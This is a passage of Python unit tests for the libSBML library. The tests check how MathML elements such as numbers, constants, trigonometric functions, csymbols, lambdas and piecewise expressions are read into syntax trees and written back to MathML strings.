)) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_default(self): s = wrapMathML("<cn> 12345.7 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL ) self.assert_( self.N.getReal() == 12345.7 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_e_notation(self): s = wrapMathML("<cn type='e-notation'> 12.3 <sep/> 5 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL_E ) self.assert_( self.N.getMantissa() == 12.3 ) self.assert_( self.N.getExponent() == 5 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_integer(self): s = wrapMathML("<cn type='integer'> 12345 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_INTEGER ) self.assert_( self.N.getInteger() == 12345 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_rational(self): s = wrapMathML("<cn type='rational'> 12342 <sep/> 2342342 </cn>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_RATIONAL ) self.assert_( self.N.getNumerator() == 12342 ) self.assert_( self.N.getDenominator() == 2342342 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_real(self): s = wrapMathML("<cn type='real'> 12345.7 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL ) self.assert_( self.N.getReal() == 12345.7 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cn_units(self): s = wrapMathMLUnits("<cn sbml:units=\"mole\"> 12345.7 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL ) self.assert_( self.N.getReal() == 12345.7 ) self.assert_( self.N.getUnits() == "mole" ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_exponentiale(self): s = wrapMathML("<exponentiale/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_CONSTANT_E ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_false(self): s = wrapMathML("<false/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_CONSTANT_FALSE ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_infinity(self): s = wrapMathML("<infinity/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL ) self.assert_( util_isInf(self.N.getReal()) == True ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_notanumber(self): s = wrapMathML("<notanumber/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL ) self.assertEqual( True, isnan(self.N.getReal()) ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_pi(self): s = wrapMathML("<pi/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_CONSTANT_PI ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_constants_true(self): s = wrapMathML("<true/>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_CONSTANT_TRUE ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_cos(self): s = wrapMathML("<apply><cos/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "cos(x)" == self.F )) pass def test_element_cosh(self): s = wrapMathML("<apply><cosh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "cosh(x)" == self.F )) pass def test_element_cot(self): s = wrapMathML("<apply><cot/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "cot(x)" == self.F )) pass def test_element_coth(self): s = wrapMathML("<apply><coth/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "coth(x)" == self.F )) pass def test_element_csc(self): s = wrapMathML("<apply><csc/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "csc(x)" == self.F )) pass def test_element_csch(self): s = wrapMathML("<apply><csch/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "csch(x)" == self.F )) pass def test_element_csymbol_avogadro(self): s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/avogadro'> NA </csymbol>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_NAME_AVOGADRO ) self.assert_(( "NA" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_csymbol_delay_1(self): s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/delay'> delay </csymbol>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY ) self.assert_(( "delay" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_csymbol_delay_2(self): s = wrapMathML("<apply>" + " <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" + "symbols/delay'> my_delay </csymbol>" + " <ci> x </ci>" + " <cn> 0.1 </cn>" + "</apply>\n") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "my_delay(x, 0.1)" == self.F )) pass def test_element_csymbol_delay_3(self): s = wrapMathML("<apply>" + " <power/>" + " <apply>" + " <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" + "symbols/delay'> delay </csymbol>" + " <ci> P </ci>" + " <ci> delta_t </ci>" + " </apply>\n" + " <ci> q </ci>" + "</apply>\n") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "pow(delay(P, delta_t), q)" == self.F )) pass def test_element_csymbol_time(self): s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_NAME_TIME ) self.assert_(( "t" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_eq(self): s = wrapMathML("<apply> <eq/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "eq(a, b, c)" == self.F )) pass def test_element_exp(self): s = wrapMathML("<apply><exp/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "exp(x)" == self.F )) pass def test_element_factorial(self): s = wrapMathML("<apply><factorial/><cn> 5 </cn></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "factorial(5)" == self.F )) pass def test_element_floor(self): s = wrapMathML("<apply><floor/><cn> 1.2 </cn></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "floor(1.2)" == self.F )) pass def test_element_function_call_1(self): s = wrapMathML("<apply> <ci> foo </ci> <ci> x </ci> </apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "foo(x)" == self.F )) pass def test_element_function_call_2(self): s = wrapMathML("<apply> <plus/> <cn> 1 </cn>" + " <apply> <ci> f </ci> <ci> x </ci> </apply>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "1 + f(x)" == self.F )) pass def test_element_geq(self): s = wrapMathML("<apply> <geq/> <cn>1</cn> <ci>x</ci> <cn>0</cn> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "geq(1, x, 0)" == self.F )) pass def test_element_gt(self): s = wrapMathML("<apply> <gt/> <infinity/>" + " <apply> <minus/> <infinity/> <cn>1</cn> </apply>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "gt(INF, INF - 1)" == self.F )) pass def test_element_invalid_mathml(self): invalid = wrapMathML("<lambda definitionURL=\"http://biomodels.net/SBO/#SBO:0000065\">" + "<bvar>" + "<ci>c</ci>" + "</bvar>" + "<apply>" + " <ci>c</ci>" + "</apply>" + "</lambda>\n") self.N = libsbml.readMathMLFromString(None) self.assert_( self.N == None ) self.N = libsbml.readMathMLFromString(invalid) self.assert_( self.N == None ) pass def test_element_lambda(self): s = wrapMathML("<lambda>" + " <bvar> <ci>x</ci> </bvar>" + " <apply> <sin/>" + " <apply> <plus/> <ci>x</ci> <cn>1</cn> </apply>" + " </apply>" + "</lambda>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "lambda(x, sin(x + 1))" == self.F )) pass def test_element_leq(self): s = wrapMathML("<apply> <leq/> <cn>0</cn> <ci>x</ci> <cn>1</cn> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "leq(0, x, 1)" == self.F )) pass def test_element_ln(self): s = wrapMathML("<apply><ln/><ci> a </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "log(a)" == self.F )) pass def test_element_log_1(self): s = wrapMathML("<apply> <log/> <logbase> <cn type='integer'> 3 </cn> </logbase>" + " <ci> x </ci>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "log(3, x)" == self.F )) pass def test_element_log_2(self): s = wrapMathML("<apply> <log/> <ci> x </ci> </apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "log10(x)" == self.F )) pass def test_element_lt(self): s = wrapMathML("<apply> <lt/> <apply> <minus/> <infinity/> <infinity/> </apply>" + " <cn>1</cn>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "lt(INF - INF, 1)" == self.F )) pass def test_element_math(self): s = wrapXML("<math xmlns='http://www.w3.org/1998/Math/MathML'/>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_UNKNOWN ) pass def test_element_neq(self): s = wrapMathML("<apply> <neq/> <notanumber/> <notanumber/> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "neq(NaN, NaN)" == self.F )) pass def test_element_not(self): s = wrapMathML("<apply> <not/> <ci> TooShabby </ci> </apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "not(TooShabby)" == self.F )) pass def test_element_operator_plus(self): s = wrapMathML("<apply> <plus/> <cn> 1 </cn> <cn> 2 </cn> <cn> 3 </cn> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "1 + 2 + 3" == self.F )) pass def test_element_operator_times(self): s = wrapMathML("<apply> <times/> <ci> x </ci> <ci> y </ci> <ci> z </ci> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "x * y * z" == self.F )) pass def test_element_or(self): s = wrapMathML("<apply> <or/> <ci>a</ci> <ci>b</ci> <ci>c</ci> <ci>d</ci> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "or(a, b, c, d)" == self.F )) pass def test_element_piecewise(self): s = wrapMathML("<piecewise>" + " <piece>" + " <apply> <minus/> <ci>x</ci> </apply>" + " <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" + " </piece>" + " <piece>" + " <cn>0</cn>" + " <apply> <eq/> <ci>x</ci> <cn>0</cn> </apply>" + " </piece>" + " <piece>" + " <ci>x</ci>" + " <apply> <gt/> <ci>x</ci> <cn>0</cn> </apply>" + " </piece>" + "</piecewise>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))" == self.F )) pass def test_element_piecewise_otherwise(self): s = wrapMathML("<piecewise>" + " <piece>" + " <cn>0</cn>" + " <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" + " </piece>" + " <otherwise>" + " <ci>x</ci>" + " </otherwise>" + "</piecewise>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "piecewise(0, lt(x, 0), x)" == self.F )) pass def test_element_power(self): s = wrapMathML("<apply><power/> <ci>x</ci> <cn>3</cn> </apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "pow(x, 3)" == self.F )) pass def test_element_root_1(self): s = wrapMathML("<apply> <root/> <degree> <cn type='integer'> 3 </cn> </degree>" + " <ci> a </ci>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "root(3, a)" == self.F )) pass def test_element_root_2(self): s = wrapMathML("<apply> <root/> <ci> a </ci> </apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "sqrt(a)" == self.F )) pass def test_element_sec(self): s = wrapMathML("<apply><sec/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "sec(x)" == self.F )) pass def test_element_sech(self): s = wrapMathML("<apply><sech/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "sech(x)" == self.F )) pass def test_element_sin(self): s = wrapMathML("<apply><sin/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "sin(x)" == self.F )) pass def test_element_sinh(self): s = wrapMathML("<apply><sinh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "sinh(x)" == self.F )) pass def test_element_tan(self): s = wrapMathML("<apply><tan/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "tan(x)" == self.F )) pass def test_element_tanh(self): s = wrapMathML("<apply><tanh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "tanh(x)" == self.F )) pass def test_element_xor(self): s = wrapMathML("<apply> <xor/> <ci>a</ci> <ci>b</ci> <ci>b</ci> <ci>a</ci> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "xor(a, b, b, a)" == self.F )) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestReadMathML)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/math/TestWriteMathML.py ```python import sys import unittest import libsbml def util_NaN(): z = 1e300 z = z * z return z - z def util_PosInf(): z = 1e300 z = z * z return z def util_NegInf(): z = 1e300 z = z * z return -z def wrapString(s): return s pass def MATHML_FOOTER(): return "</math>" pass def MATHML_HEADER(): return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\">\n" pass def MATHML_HEADER_UNITS(): return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\"" pass def MATHML_HEADER_UNITS2(): return " xmlns:sbml=\"http://www.sbml.org/sbml/level3/version1/core\">\n" pass def XML_HEADER(): return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" pass def wrapMathML(s): r = XML_HEADER() r += MATHML_HEADER() r += s r += MATHML_FOOTER() return r pass def wrapMathMLUnits(s): r = XML_HEADER() r += MATHML_HEADER_UNITS() r += MATHML_HEADER_UNITS2() r += s r += MATHML_FOOTER() return r pass class TestWriteMathML(unittest.TestCase): global S S = None global N N = None def equals(self, *x): if len(x) == 2: return x[0] == x[1] elif len(x) == 1: return x[0] == self.OSS.str() def setUp(self): self.N = None self.S = None pass def tearDown(self): self.N = None self.S = None pass def test_MathMLFormatter_ci(self): expected = wrapMathML(" <ci> foo </ci>\n") self.N = libsbml.parseFormula("foo") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_1(self): expected = wrapMathML(" <cn type=\"e-notation\"> 0 <sep/> 3 </cn>\n" ) self.N = libsbml.parseFormula("0e3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_2(self): expected = wrapMathML(" <cn type=\"e-notation\"> 2 <sep/> 3 </cn>\n" ) self.N = libsbml.parseFormula("2e3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_3(self): expected = wrapMathML(" <cn type=\"e-notation\"> 1234567.8 <sep/> 3 </cn>\n" ) self.N = libsbml.parseFormula("1234567.8e3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_4(self): expected = wrapMathML(" <cn type=\"e-notation\"> 6.0221367 <sep/> 23 </cn>\n" ) self.N = libsbml.parseFormula("6.0221367e+23") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_5(self): expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -6 </cn>\n" ) self.N = libsbml.parseFormula(".000004") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_6(self): expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -12 </cn>\n" ) self.N = libsbml.parseFormula(".000004e-6") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_e_notation_7(self): expected = wrapMathML(" <cn type=\"e-notation\"> -1 <sep/> -6 </cn>\n" ) self.N = libsbml.parseFormula("-1e-6") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_integer(self): expected = wrapMathML(" <cn type=\"integer\"> 5 </cn>\n") self.N = libsbml.parseFormula("5") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_rational(self): expected = wrapMathML(" <cn type=\"rational\"> 1 <sep/> 3 </cn>\n" ) self.N = libsbml.ASTNode() self.N.setValue(1,3) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_real_1(self): expected = wrapMathML(" <cn> 1.2 </cn>\n") self.N = libsbml.parseFormula("1.2") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_real_2(self): expected = wrapMathML(" <cn> 1234567.8 </cn>\n") self.N = libsbml.parseFormula("1234567.8") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_real_3(self): expected = wrapMathML(" <cn> -3.14 </cn>\n") self.N = libsbml.parseFormula("-3.14") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_real_locale(self): expected = wrapMathML(" <cn> 2.72 </cn>\n") self.N = libsbml.parseFormula("2.72") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_cn_units(self): expected = wrapMathMLUnits(" <cn sbml:units=\"mole\"> 1.2 </cn>\n") self.N = libsbml.parseFormula("1.2") self.N.setUnits("mole") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_exponentiale(self): expected = wrapMathML(" <exponentiale/>\n") self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_E) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_false(self): expected = wrapMathML(" <false/>\n") self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_FALSE) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_infinity(self): expected = wrapMathML(" <infinity/>\n") self.N = libsbml.ASTNode() self.N.setValue( util_PosInf() ) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_infinity_neg(self): expected = wrapMathML(" <apply> <minus/> <infinity/> </apply>\n" ) self.N = libsbml.ASTNode() self.N.setValue(- util_PosInf()) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_notanumber(self): expected = wrapMathML(" <notanumber/>\n") self.N = libsbml.ASTNode(libsbml.AST_REAL) self.N.setValue( util_NaN() ) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_constant_true(self): expected = wrapMathML(" <true/>\n") self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_TRUE) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_csymbol_avogadro(self): expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/avogadro\"> NA </csymbol>\n") self.N = libsbml.ASTNode(libsbml.AST_NAME_AVOGADRO) self.N.setName("NA") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_csymbol_delay(self): expected = wrapMathML(" <apply>\n" + " <csymbol encoding=\"text\" definitionURL=\"http://www.sbml.org/sbml/" + "symbols/delay\"> my_delay </csymbol>\n" + " <ci> x </ci>\n" + " <cn> 0.1 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("delay(x, 0.1)") self.N.setName("my_delay") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_csymbol_time(self): expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/time\"> t </csymbol>\n") self.N = libsbml.ASTNode(libsbml.AST_NAME_TIME) self.N.setName("t") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_function_1(self): expected = wrapMathML(" <apply>\n" + " <ci> foo </ci>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("foo(1, 2, 3)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_function_2(self): expected = wrapMathML(" <apply>\n" + " <ci> foo </ci>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <apply>\n" + " <ci> bar </ci>\n" + " <ci> z </ci>\n" + " </apply>\n" + " </apply>\n") self.N = libsbml.parseFormula("foo(1, 2, bar(z))") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_lambda(self): expected = wrapMathML(" <lambda>\n" + " <bvar>\n" + " <ci> x </ci>\n" + " </bvar>\n" + " <bvar>\n" + " <ci> y </ci>\n" + " </bvar>\n" + " <apply>\n" + " <root/>\n" + " <degree>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </degree>\n" + " <apply>\n" + " <plus/>\n" + " <apply>\n" + " <power/>\n" + " <ci> x </ci>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </apply>\n" + " <apply>\n" + " <power/>\n" + " <ci> y </ci>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </apply>\n" + " </apply>\n" + " </apply>\n" + " </lambda>\n") self.N = libsbml.parseFormula("lambda(x, y, root(2, x^2 + y^2))") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_lambda_no_bvars(self): expected = wrapMathML(" <lambda>\n" + " <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </apply>\n" + " </lambda>\n") self.N = libsbml.parseFormula("lambda(2 + 2)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_log(self): expected = wrapMathML(" <apply>\n" + " <log/>\n" + " <logbase>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </logbase>\n" + " <ci> N </ci>\n" + " </apply>\n") self.N = libsbml.parseFormula("log(2, N)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_minus(self): expected = wrapMathML(" <apply>\n" + " <minus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("1 - 2") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_minus_unary_1(self): expected = wrapMathML(" <cn type=\"integer\"> -2 </cn>\n" ) self.N = libsbml.parseFormula("-2") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_minus_unary_2(self): expected = wrapMathML(" <apply>\n" + " <minus/>\n" + " <ci> a </ci>\n" + " </apply>\n") self.N = libsbml.parseFormula("-a") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_piecewise(self): expected = wrapMathML(" <piecewise>\n" + " <piece>\n" + " <apply>\n" + " <minus/>\n" + " <ci> x </ci>\n" + " </apply>\n" + " <apply>\n" + " <lt/>\n" + " <ci> x </ci>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " </apply>\n" + " </piece>\n" + " <piece>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " <apply>\n" + " <eq/>\n" + " <ci> x </ci>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " </apply>\n" + " </piece>\n" + " <piece>\n" + " <ci> x </ci>\n" + " <apply>\n" + " <gt/>\n" + " <ci> x </ci>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " </apply>\n" + " </piece>\n" + " </piecewise>\n") f = "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))"; self.N = libsbml.parseFormula(f) self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_piecewise_otherwise(self): expected = wrapMathML(" <piecewise>\n" + " <piece>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " <apply>\n" + " <lt/>\n" + " <ci> x </ci>\n" + " <cn type=\"integer\"> 0 </cn>\n" + " </apply>\n" + " </piece>\n" + " <otherwise>\n" + " <ci> x </ci>\n" + " </otherwise>\n" + " </piecewise>\n") self.N = libsbml.parseFormula("piecewise(0, lt(x, 0), x)") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_plus_binary(self): expected = wrapMathML(" <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("1 + 2") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, self.equals(expected,self.S) ) pass def test_MathMLFormatter_plus_nary_1(self): expected = wrapMathML(" <apply>\n" + " <plus/>\n" + " <cn type=\"integer\"> 1 </cn>\n" + " <cn type=\"integer\"> 2 </cn>\n" + " <cn type=\"integer\"> 3 </cn>\n" + " </apply>\n") self.N = libsbml.parseFormula("1 + 2 + 3") self.S = libsbml.writeMathMLToString(self.N) self.assertEqual( True, 